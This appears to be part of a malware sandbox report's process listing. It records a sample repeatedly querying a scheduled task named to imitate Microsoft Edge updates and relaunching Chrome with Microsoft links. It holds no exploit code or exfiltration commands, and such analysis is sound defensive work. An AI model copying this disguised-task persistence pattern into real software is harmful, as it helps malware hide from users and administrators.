                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:43
                                                                                                                      Start time:07:39:51
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:44
                                                                                                                      Start time:07:39:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff72bec0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:45
                                                                                                                      Start time:07:39:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:46
                                                                                                                      Start time:07:39:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:47
                                                                                                                      Start time:07:40:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:48
                                                                                                                      Start time:07:40:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:49
                                                                                                                      Start time:07:40:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:50
                                                                                                                      Start time:07:40:05
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:51
                                                                                                                      Start time:07:40:06
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:52
                                                                                                                      Start time:07:40:06
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:53
                                                                                                                      Start time:07:40:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:54
                                                                                                                      Start time:07:40:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:55
                                                                                                                      Start time:07:40:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:07:40:13
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:07:40:13
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:07:40:13
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:07:40:13
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:07:40:14
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:07:40:20
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:07:40:20
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:07:40:20
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:07:40:20
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:07:40:21
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:07:40:25
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:07:40:26
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:07:40:31
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:07:40:31
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:07:40:32
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:07:40:33
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:07:40:34
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:07:40:38
Start date:29/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=532930
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:75
                                                                                                                      Start time:07:40:39
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:76
                                                                                                                      Start time:07:40:40
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:77
                                                                                                                      Start time:07:40:40
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:78
                                                                                                                      Start time:07:40:40
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:79
                                                                                                                      Start time:07:40:44
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:80
                                                                                                                      Start time:07:40:44
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:81
                                                                                                                      Start time:07:40:45
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:82
                                                                                                                      Start time:07:40:49
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:83
                                                                                                                      Start time:07:40:49
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:84
                                                                                                                      Start time:07:40:50
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:85
                                                                                                                      Start time:07:40:50
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:86
                                                                                                                      Start time:07:40:50
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:87
                                                                                                                      Start time:07:40:55
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:88
                                                                                                                      Start time:07:40:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 89
Start time: 07:40:57
Start date: 29/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase: 0x7ff70dbc0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 90
Start time: 07:40:57
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 91
Start time: 07:40:57
Start date: 29/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 11%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 45

execution_graph: [interactive execution graph; raw node and edge data of the graph widget not reproduced here]
